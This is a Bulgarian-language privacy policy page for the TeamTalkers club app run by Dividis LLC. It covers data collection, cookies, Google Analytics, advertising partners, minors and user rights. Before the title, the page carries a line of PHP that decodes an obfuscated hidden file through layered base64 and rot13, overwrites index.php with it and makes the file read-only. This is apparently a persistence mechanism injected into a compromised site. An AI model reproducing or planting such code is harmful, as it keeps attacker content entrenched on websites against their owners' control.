$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Политика за поверителност - Team Talkers
T E A M T A L K E R S

Последно обновяване на текста: 26 февруари 2020 г.

Тази политика за поверителност описва нашите политики и процедури относно събирането, използването и разкриването на Вашата информация, когато използвате услугата. Политиката за поверителност Ви информира за Вашите права за поверителност и как законът Ви защитава. Ние използваме Вашите лични данни, за да предоставим и подобрим услугата. Използвайки услугата, Вие се съгласявате със събирането и използването на информация в съответствие с тази политика за поверителност.

Дефиниции:

За целта на тази Политика за поверителност:

В ие означава физическото лице, което осъществява достъп или
използва Услугата, или компанията или друго юридическо лице, от името на което такова лице има достъп или използва Услугата, както е приложимо.
К омпания (в това Споразумение споменато като „Компанията“, „Ние“,
„Нас“ или „Нашата“) се отнася до TeamTalkers, Dividis LLC.
П рофил означава уникален профил, създаден за Вас за достъп до
нашата Услуга или части от нашата Услуга.
Уебсайт се отнася до TeamTalkers, достъпно
на h ttp://www.teamtalkers.com/en/
Доставчик на услуга означава всяко физическо или юридическо лице,
което обработва данните от името на Компанията. Отнася се до трети лица или лица, наети от Компанията, за да улеснят Услугата, да предоставят Услугата от името на Компанията, да извършват услуги, свързани с Услугата, или да помагат на Компанията да анализира как се използва Услугата.
Услуга на трета страна (социална медия) се отнася до всеки
уебсайт или всеки уебсайт на социалната мрежа, чрез който Потребителят може да влезе или да създаде профил, за да използва Услугата.
Л ични данни са всяка информация, която се отнася до
идентифицирано или подлежащо на идентифициране лице.
Б исквитки са малки файлове, които се поставят на Вашия компютър,
мобилно устройство или друго устройство от уебсайт, съдържащ подробности от историята на сърфирането Ви в този уебсайт сред многобройните използвания. Данните за използване се отнасят до данни, събрани автоматично, или генерирани от използването на Услугата, или от самата Сервизна инфраструктура (например продължителността на посещението на страница).

З ащо сега трябва да прочета тази политика за поверителност?

Ние от TeamTalkers вярваме, че е важно да Ви информираме кои сме и защо правим това, което правим. Непрекъснато работим върху различни услуги и (интерактивни) продукти за Вашия клуб или асоциация. За да можем да правим това оптимално, искаме да използваме определени данни, но и да ги събираме.

И, разбира се, не е необходимо да се споменава, че защитата и поверителността на тези данни са важни.

З а какво се отнася тази Политика за поверителност?
Това се отнася за всички продукти и услуги, които се предлагат от Dividis LLC. Това означава всички уебсайтове, приложения (включително мобилни) и Интернет услуги. Например мобилното приложение TeamTalkers.

Но се отнася и за други начини, по които влизате в контакт с нас. Това може да бъде фирмено посещение, семинари или състезания и т.н.

К ой е отговорен за тази политика за поверителност?
Dividis LLC е със седалище на ул. „Христо Белчев“, ет. 5, офис 18, 1000 София, България.
По-нататък в тези условия отговорното дружество се нарича също „Ние“.

П роменят ли се понякога условията?
Ние можем и трябва да променяме правилата и условията на политиката за поверителност и/или политиката за бисквитки, когато това се изисква от закона или в контекста на промени в нашите услуги.

Промените стават видими по начин, който е видим за Вас, и се прилагат от това време на публикуване.

В случай на наистина важни промени, ние ще Ви информираме възможно най-скоро и ще поискаме Вашето разрешение, ако това е необходимо.

Т рябва ли да чета и други условия?
Dividis препоръчва също да прочетете внимателно нашата политика за бисквитки. Там ще намерите вида на бисквитките, използвани от онлайн услугите на Dividis llc и за кои се събира лична информация.

К аква е причината Dividis да събира личната Ви информация?
Ние събираме лични данни, за да предоставим по-добри услуги на потребителите. Считаме, че е важно да предлагаме подходящите програми, услуги, реклама и друго съдържание на нашите потребители, по всяко време и на всяко място. По този

начин ние опознаваме по-добре нашите потребители въз основа на редица лични данни, за да можем да приспособяваме услугите си, когато е възможно, към нуждите на нашите потребители. Можем да се свържем и с Вас въз основа на лична информация. Компанията може да използва Лични данни за следните цели:

З а осигуряване и поддържане на нашата Услуга, включително да следим използването на нашата Услуга.
З а управление на Вашия профил: да управляваме Вашата регистрация като потребител на Услугата. Личните данни, които предоставяте, могат да Ви предоставят достъп до различни функционалности на Услугата, които са достъпни за Вас като регистриран потребител.
З а изпълнение на договор: разработването, спазването и предприемането на договора за покупка на продуктите, артикулите или услугите, които сте закупили, или на друг договор с Нас чрез Услугата.
З а да се свържем с Вас: За да се свържем с Вас по имейл, с телефонно обаждане, SMS или други еквивалентни форми на електронна комуникация, като известия на мобилно приложение относно актуализации или информационни комуникации, свързани с функционалностите, продуктите или договорените услуги, включително актуализациите за сигурност, когато е необходимо или разумно за тяхното изпълнение. За да Ви предоставим новини, специални оферти и обща информация за други стоки, услуги и събития, които предлагаме, подобни на тези, които вече сте закупили или за които сте изпратили запитване, освен ако не сте избрали да не получавате такава информация.
З а управление на Вашите заявки: За да присъстваме и управляваме
Вашите заявки към нас.

К ак Dividis събира личната Ви информация?

Лични данни, които ни предоставяте.
За да можете да използвате определени услуги на Dividis, ще трябва да създадете профил. Ако направите това, може да поискаме някаква лична информация, като Ваш имейл адрес, име, дата на раждане, пол и пощенски код. Тези данни се съхраняват във Вашия Teamtalkers профил. След регистрацията можем също да поискаме допълнителна информация, която може да ни помогне да предоставим още повече персонализирани услуги.

Видове събирани данни Лични данни

Докато използвате нашата Услуга, можем да Ви помолим да ни предоставите определена лична информация, която може да се използва за контакт с Вас или за Вашето идентифициране. Личната информация може да включва, но не се ограничава до:

  • Имейл адрес
  • Име и фамилия
  • Телефонен номер, адрес, щат, провинция, пощенски код, град
  • Данни за употреба

Данни за употреба
Данните за употреба се събират автоматично при използване на Услугата.
Данните за използване могат да включват информация като адрес на Интернет протокола на Вашето устройство (напр. IP адрес), тип браузър, версия на браузъра, страниците на нашата Услуга, които посещавате, час и дата на посещението Ви, време, прекарано на тези страници, уникални идентификатори на устройство и други диагностични данни.

Когато получите достъп до Услугата от или чрез мобилно устройство, ние можем да събираме определена информация автоматично, включително, но не само, типа на мобилното устройство, което използвате, уникален идентификационен номер на мобилното Ви устройство, IP адреса на Вашето мобилно устройство, тип на операционната система на мобилното устройство, типа на мобилния Интернет браузър, който използвате, уникални идентификатори на устройството и други диагностични данни.
Можем също така да събираме информация, която Вашият браузър изпраща, когато посещавате нашата Услуга или когато имате достъп до Услугата от или чрез мобилно устройство.
Например ако се регистрирате за специална промоция или просто промоция, или участвате в конкурс или гласувате в контекста на програма, ще бъдете помолени да предоставите определени лични данни.
В допълнение, ние ще събираме Вашата лична информация, когато се свържете с нас, например, ако изпратите имейл с въпроси, оценки или оплаквания относно нашите услуги, участвате в проучване на Dividis, като изпращате SMS, имейл или друго съобщение или когато посещавате събитие.

К акво всъщност събираме от личните Ви данни, когато и зползвате нашите услуги?
Ние събираме данни за това, което използвате от нашите онлайн услуги, както и как го използвате. По този начин можем да приспособим нашите продукти и услуги според Вашите нужди и интереси и можем по-добре да разберем как се използват нашите услуги.

Няколко примера:

Данни от регистрационния файл, като IP адрес, кликвания, отворени страници, час и дата на посещението Ви, браузъра Ви, и т.н. Тези данни ни позволяват да Ви разпознаем и могат да ни кажат как използвате нашите услуги, например кои статии, аудиоклипове или видеоклипове сте чели, слушали или гледали и дали сте чели, слушали или гледали до края.

Данни за устройството, като IP адрес, марка, тип и операционна система на Вашето устройство, и т.н. Доколкото това би било полезно за предоставяне на съответната услуга, можем също да използваме това, за да предоставим груба индикация за Вашето местоположение.

Dividis използва бисквитки и други подобни технологии за това. За повече информация, моля, посетете нашата политика за
б исквитки.

Проследяващи технологии и бисквитки

Ние използваме Бисквитки и подобни технологии за проследяване, за да проследяваме дейността в нашата Услуга и да съхраняваме определена информация. Използваните технологии за проследяване са маяци, тагове и скриптове за събиране и проследяване на информация и за подобряване и анализ на нашата Услуга.
Можете да инструктирате Вашия браузър да откаже всички Бисквитки или да посочи кога се изпраща Бисквитка. Ако обаче не приемате Бисквитки, може да не успеете да използвате някои части от нашата Услуга.

Бисквитките могат да бъдат „Постоянни“ или „Сесийни“. Постоянните бисквитки остават на Вашия личен компютър или мобилно устройство, когато сте офлайн, докато Сесийните бисквитки се изтриват веднага щом затворите уеб браузъра си.

Н ие използваме сесийни и постоянни Бисквитки за целите,
посочени по-долу:

Необходими / Основни бисквитки:
Тип: Сесийни бисквитки Администрирани от: Нас
Цел: Тези Бисквитки са от съществено значение, за да Ви предоставят услуги, достъпни чрез Уебсайта, и да Ви позволят да използвате някои от неговите функции. Те помагат за удостоверяване на потребителите и предотвратяват измамно използване на потребителски профили. Без тези Бисквитки, услугите, които сте поискали, не могат да бъдат предоставени,

а Ние използваме тези Бисквитки само за да Ви предоставим тези услуги.

Политика за бисквитки / Известие за приемане на бисквитки
Тип: Постоянни бисквитки Администрирани от: Нас
Цел: Тези Бисквитки идентифицират дали потребителите са приели използването на Бисквитки в Уебсайта.

Функционални бисквитки Тип: Постоянни бисквитки Администрирани от: Нас
Цел: Тези Бисквитки ни позволяват да запомним избора, който правите, когато използвате Уебсайта, като например запомняне на Вашите данни за вход или предпочитания за език. Целта на тези Бисквитки е да Ви предоставят по-лично преживяване и да предотвратят ново въвеждане на Вашите предпочитания всеки път, когато използвате Уебсайта.

Google Analytics

Този уебсайт използва услугите на Google Analytics, услуга за уеб анализ, предоставяна от Google. Google Analytics използва
„бисквитки“, които са текстови файлове, поставени на Вашия компютър, за да помогнат на уебсайта да анализира как потребителите използват уебсайта.

Информацията, генерирана от бисквитката за използване на уебсайта от Ваша страна (включително Вашия IP адрес), ще бъде предавана и съхранявана от Google на сървъри в Съединените щати.

Google ще използва тази информация, за да оцени използването на уебсайта, съставянето на отчети за дейността на уебсайта за операторите на уебсайтове и предоставянето на други услуги, свързани с дейността на уебсайта и използването на Интернет.

Google може също така да прехвърля тази информация на трети страни, когато това се изисква по закон или когато такива трети страни обработват информацията от името на Google.
Google няма да свързва Вашия IP адрес с други данни, съхранявани от Google. Можете да откажете използването на бисквитки, като изберете подходящите настройки на Вашия браузър, но имайте предвид, че ако направите това, може да не успеете да използвате пълната функционалност на този уебсайт.

Използвайки този уебсайт, Вие се съгласявате Google да обработва Ваши данни по начина и за целите, посочени по-горе.

Можете да предотвратите събирането на Вашите данни от Google Analytics, като кликнете върху следния линк. Ще бъде зададена бисквитка за отказ, за да се предотврати събирането на Вашите данни при бъдещи посещения на този сайт: Деактивирайте Google Analytics.

За повече информация относно бисквитките, които използваме, и Вашите решения относно бисквитките, моля, свържете се с нас на privacy@teamtalkers.com

М ожем да споделяме Вашата лична информация в следните
с итуации:

С доставчици на услуги: Можем да споделяме Вашата лична информация с Доставчиците на услуги, за да наблюдаваме и анализираме използването на нашата Услуга, да Ви показваме реклами, за да може това да помогне за подкрепата и поддържането на нашата Услуга, да се свържем с Вас, да рекламираме на уебсайтове на трети страни до Вас, след като Вие посети нашата Услуга или за обработка на плащания.
За бизнес трансфери: Можем да споделяме или прехвърляме
Вашата лична информация във връзка или по време на преговори за всяко сливане, продажба на активи на Компанията, финансиране или придобиване на целия или на част от нашия бизнес от друга компания.
Със съдружници: Ние можем да споделяме Вашата информация с нашите съдружници, като в този случай ще изискваме тези партньори да спазват настоящата Политика за поверителност. Съдружниците включват нашата компания майка и всички други дъщерни дружества, съвместни предприятия или други компании, които ние контролираме или които са под общ контрол с нас.
С бизнес партньори: Можем да споделяме Вашата информация с
нашите бизнес партньори, за да Ви предложим определени продукти, услуги или промоции.
С други потребители: Когато споделяте лична информация или
взаимодействате по друг начин в публичните зони с други потребители, такава информация може да бъде гледана от всички потребители и може да бъде разпространена публично навън. Ако взаимодействате с други потребители или се регистрирате чрез услуга за социални медии на трети страни, Вашите контакти в услугата на трети страни за социални медии могат да видят Вашето име, профил, снимки и описание на Вашата дейност. По подобен начин другите потребители ще могат да преглеждат описания на Вашата дейност, да комуникират с Вас и да преглеждат Вашия профил.

Лични данни, които получаваме от трети страни.

Когато се вписвате в teamtalkers или друга наша услуга чрез уебсайт на социални мрежи или използвате функции за външни социални мрежи от нашите онлайн услуги, Вие упълномощавате тези външни социални мрежи да споделят определени лични данни с нас.

По подразбиране това са основните данни на Вашия профил в уебсайта на социалната мрежа (име, имейл адрес, дата на раждане, пощенски код, пол), които след това добавяме към Вашия teamtalkers или друг Dividis профил, ако те липсват. Може да се отнася и за Вашия профил в тези мрежови уебсайтове, като Вашите предпочитания и харесвания. Това може да се отнася само за данни, които публично споделяте в уебсайта на социалната мрежа, и дотолкова, доколкото личните Ви настройки в уебсайта на социалната мрежа го позволяват. Ако не искате това да се случи, препоръчваме Ви да коригирате
н астройките за поверителност на съответния уебсайт на
с оциална мрежа.

Други източници

Нашите онлайн услуги са разположени в иновативна и динамична среда. Това гарантира непрекъснато подобряване на персонализираното обслужване. В резултат на това могат да възникнат нови приложения и начини, по които ние обработваме Вашите лични данни. В такъв случай ние ще Ви информираме възможно най-изчерпателно за актуализациите на тази политика за поверителност.

А ми правата на непълнолетните и събирането на личните им д анни?
Имаме много строга политика по отношение на непълнолетните. По принцип събираме данни само когато сме получили поверение от родител. Използването на различни наши услуги като Teamtalkers има минимална възраст от 13 години.

Поверителност на децата
Услугата ни не се обръща към никого под 13-годишна възраст. Ние не събираме съзнателно лична информация от лица на възраст под 13 години. Ако сте родител или настойник и знаете, че Вашето дете ни е предоставило лични данни, моля, свържете се с нас. Ако разберем, че сме събирали лични данни от лица под 13-годишна възраст без проверка на съгласието на родителите, ние предприемаме стъпки за премахване на тази информация от нашите сървъри.

Също така можем да ограничим начина, по който събираме, използваме и съхраняваме част от информацията на

Потребители на възраст между 13 и 18 години. В някои случаи това означава, че няма да можем да предоставим определена функционалност на Услугата на тези потребители.

Ако трябва да разчитаме на съгласието като правно основание за обработка на Вашата информация и Вашата държава изисква съгласие от родител, може да изискаме съгласието на Ваш родител преди да съберем и използваме тази информация.

З а какво вече сме събрали тези лични данни?
За да можем да Ви предоставим нашите услуги. По този начин можем да продължим да Ви предоставяме нашите услуги безплатно, но и да Ви информираме за новите разработки и/или поддръжка.

За да Ви разпознаем като потребител на Teamtalkers от Dividis Когато използвате нашите услуги и правите това чрез Вашия профил в Teamtalkers, технологията позволява да Ви разпознае като регистриран потребител, което е необходимо за получаване на директен достъп до услугата, без да се налага да влизате през цялото време.

За подобряване и анализ на нашите продукти
Вашите данни се използват, за да видите кои от нашите услуги са полезни, интересни и могат да се подобрят за Вас като потребител. Като знаем какво Вие като потребител четете, слушате, разглеждате или използвате, ние можем да предоставим необходимата обратна връзка на нашите производители на програми и разработчици, за да подобрим нашето предложение и да го направим по-уместно. За това можем да използваме и анкети, които Ви представяме.

Вашите данни могат също да показват по-персонализирани и подходящи реклами в нашите онлайн услуги. Например, ако смятаме, че се интересувате от козметични продукти, ще забележите, че от време на време Ви показваме реклами на такива продукти. Доходите, които Dividis llc придобива от тази услуга, например с Teamtalkers, винаги ще бъдат споделени с Вашата асоциация в съответствие с договорените условия.

Dividis има споразумения с 45 доставчици за реклами. Има писмени споразумения с всеки от тях по отношение на разпоредбите на GDPR и Вашите данни. Това се отнася до сигурността и защитата на данните, които тези партньори получават от нас. Прехвърлянето на данни е в криптиран вид.

Ние Ви предоставяме контрол върху използването на Вашите данни за тези рекламни цели. Ако не искате Вашите данни да се използват за тези цели, винаги можете да коригирате това чрез
н астройките си за бисквитки. Ако коригирате тези настройки,
пак ще виждате и/или чувате реклами в нашите услуги и платформи. Те обаче ще са по-малко уместни, защото вече не са адаптирани към Вашите интереси.

За да Ви информираме за нашето предложение
Ние също използваме Вашите данни за контакт и друга информация, събрана, за да Ви информираме за новини, бъдещи промоции или събития, промоции, нови услуги и др. За това се нуждаем от Вашето разрешение. Ако вече не искате да сте информирани, можете да ни уведомите ч рез линка за отписване в
д олната част на имейлите.

Предотвратяване на измама и злоупотреба и разкриване
Можем също така да използваме данни за предотвратяване, откриване и разследване на незаконни или заподозрени незаконни практики, като измама (например с платежни инструменти) и за да наложим общите ни условия за ползване, което е както във Ваш интерес като потребител, така и в наш.

И мат ли трети страни достъп до Вашите данни и/или те се п репродават?
Освен ако не сте дали съгласието си или не сме законово задължени да го направим, ние няма да предаваме, продаваме и т.н. Вашите лични данни на трети лица.

В определени случаи някои трети страни ще получат достъп до информацията, събрана за Вас:

Доставчици
За да предоставим нашите услуги, ние разчитаме на редица независими компании или доставчици на услуги, като например предоставяне на редица инфраструктурни или ИТ услуги, извършване на платежни транзакции чрез нашите услуги, провеждане на проучвания, и т.н. Възможно е такива компании да имат достъп до определени данни и информация като част от възложението им. Ние допускаме това дотолкова, доколкото е необходимо за изпълнението на задачата и тези компании предлагат необходимите гаранции по отношение на достъпа и възможното използване на тези данни и информация.

Социални медии
Някои от нашите услуги имат социални медии – „бутони“ за пренасочване към мрежи като Facebook, LinkedIn, Whatsapp и

други. Това прави лесно споделянето на информация за Вас като потребител. Нямаме управление или влияние над тези бутони. Това е под контрола на самите социални мрежи. Тези бутони са подготвени и се управляват от самите социални мрежи. Dividis няма контрол над това. От Вас зависи да прегледате техните условия за ползване и политика за поверителност. Какво четете тук, се отнася само до нашата политика за поверителност.

Власти
При определени обстоятелства може да се наложи да споделим Вашите данни или да ги предадем на властите. Това може да е случай за спазване на закона или съдебно решение, за откриване на измами или проблеми със сигурността и за адресиране или за защита на правата на Dividis.

Обединена или анонимна информация
Dividis може да споделя определени обобщени или анонимни данни с трети страни. Ние внимателно ще наблюдаваме, за да се уверим, че Dividis LLC и тези компании не могат да Ви идентифицират пряко или косвено по никакъв начин.

Прехвърляне на Вашите лични данни

Вашата информация, включително личните данни, се обработва в офисите на Компанията и на всички други места, където се намират страните, участващи в обработката. Това означава, че тази информация може да бъде прехвърлена – и поддържана – на компютри, разположени извън Вашия щат, провинция, държава или друга правителствена юрисдикция, където законите за защита на данните могат да се различават от тези, на чиято територия се намирате.
Вашето съгласие с настоящата Политика за поверителност, последвано от представянето на такава информация, представлява Вашето съгласие за такова прехвърляне.
Компанията ще предприеме всички необходими стъпки, за да гарантира, че Вашите данни се третират безопасно и в съответствие с настоящата Политика за поверителност и Вашите лични данни няма да се прехвърлят на организация или държава, освен ако няма адекватен контрол, включително сигурността на Вашите данни и друга лична информация.

К олко дълго се съхраняват Вашите данни?
Съществуват законови срокове за данните, които могат да се съхраняват. Това зависи, наред с други неща, от целите, за които се съхраняват данните. Ние от Dividis llc гарантираме, че тези периоди не се надвишават.

Запазване на Вашите лични данни

Компанията ще запази Вашите лични данни само докато е необходимо за целите, посочени в настоящата Политика за поверителност. Ние ще запазим и използваме Вашите лични данни до степента, необходима, за да се съобразим с нашите правни задължения (например ако се изисква да запазим Вашите данни, за да се съобразим с приложимите закони), да разрешим спорове и да наложим нашите правни споразумения и политики.
Компанията ще запазва и данните за употреба за вътрешни анализи. Данните за употреба обикновено се запазват за по-кратък период от време, с изключение на случаите, когато тези данни се използват за подсилване на сигурността или за подобряване на функционалността на нашата Услуга, или когато сме задължени по закон да съхраняваме тези данни за по-дълги периоди от време.

К ак можете да управлявате данните си и евентуално да ги и зтриете?
Освен това посочваме, че трябва разумно да можем да потвърдим Вашата самоличност, за да упражним Вашите права, така че да предотвратим възможността някой друг да ги използва. Можете да прегледате Вашите лични данни, които обработваме по всяко време, евентуално да ги коригирате за неточности или да ги допълните и изтриете. Ако имате профил с Teamtalkers, можете сами да промените или изтриете някои лични данни. В други случаи трябва да се свържете с нас. Това може да стане по имейл на адрес privacy@teamtalkers.com. Трябва да сте максимално конкретни, формулирайки заявеното искане, за да можем да се отнесем с Вас възможно най-коректно.

Също така винаги имате право да възразите срещу използването на Вашите данни за целите на директния маркетинг.

К ак се защитават Вашите данни?
Ние работим със защитени сървъри и за нашите услуги за съобщения работим с криптиране от потребител на потребител. Изисква се защита. Ето защо ние използваме различни технологии и мерки за сигурност, за да защитим адекватно Вашите данни от неоторизиран достъп, употреба, загуба или разкриване. Следователно редовното одитиране на тези мерки за сигурност е стандарт. За съжаление, обменът на информация през Интернет никога не е 100% сигурен. Въпреки че правим всичко по силите си, за да гарантираме сигурността на Вашите данни, не можем да гарантираме това по абсолютен начин.

Ако имате някакви въпроси или коментари или ако вече не желаете да използвате нашите услуги и/или продукти, моля,
свържете се с нас на p rivacy@teamtalkers.com.
По имейл: office@teamtalkers.com
Като посетите тази страница в нашия уебсайт:
https://www.teamtalkers.com/contact/
По телефон: 00359 87 77 87 819